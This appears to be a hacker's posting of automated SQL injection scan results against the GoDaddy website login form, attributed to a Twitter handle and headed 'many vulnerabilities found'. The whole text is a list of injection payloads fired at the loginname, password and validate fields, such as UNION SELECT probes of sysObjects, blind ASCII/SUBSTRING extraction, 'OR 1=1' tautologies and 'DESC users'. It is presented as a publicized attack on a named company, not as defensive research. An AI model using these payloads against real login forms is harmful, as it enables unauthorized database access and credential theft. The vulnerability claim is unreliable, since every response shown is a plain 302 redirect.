http://www.godaddy.com/
many vulnerabilities found
by: @AnonymousOwn3r http://twitter.com/AnonymousOwn3r
SQL Injection String Tests Summary (43860 results recorded)
Failures: 51
Warnings: 0
Passes: 43809
SQL Injection String Test Results
loginname
Submitted Form State:
password:
validate: 1
Results:
Server Status Code: 302 Found
Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
Server Status Code: 302 Found
Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Server Status Code: 302 Found
Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: ' OR username IS NOT NULL OR username = '
Server Status Code: 302 Found
Tested value: 1' AND non_existant_table = '1
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: '; DESC users; --
Server Status Code: 302 Found
Tested value: 1 AND USER_NAME() = 'dbo'
Server Status Code: 302 Found
Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Server Status Code: 302 Found
Tested value: 1 AND 1=1
Server Status Code: 302 Found
Tested value: 1 EXEC XP_
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 OR 1=1
password
Submitted Form State:
loginname:
validate: 1
Results:
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
Server Status Code: 302 Found
Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
Server Status Code: 302 Found
Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Server Status Code: 302 Found
Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Server Status Code: 302 Found
Tested value: ' OR username IS NOT NULL OR username = '
Server Status Code: 302 Found
Tested value: 1' AND non_existant_table = '1
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: '; DESC users; --
Server Status Code: 302 Found
Tested value: 1 AND USER_NAME() = 'dbo'
Server Status Code: 302 Found
Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Server Status Code: 302 Found
Tested value: 1 AND 1=1
Server Status Code: 302 Found
Tested value: 1 EXEC XP_
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 OR 1=1
validate
Submitted Form State:
loginname:
password:
Results:
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
Server Status Code: 302 Found
Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
Server Status Code: 302 Found
Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Server Status Code: 302 Found
Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Server Status Code: 302 Found
Tested value: ' OR username IS NOT NULL OR username = '
Server Status Code: 302 Found
Tested value: 1' AND non_existant_table = '1
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: '; DESC users; --
Server Status Code: 302 Found
Tested value: 1 AND USER_NAME() = 'dbo'
Server Status Code: 302 Found
Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Server Status Code: 302 Found
Tested value: 1 AND 1=1
Server Status Code: 302 Found
Tested value: 1 EXEC XP_
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 OR 1=1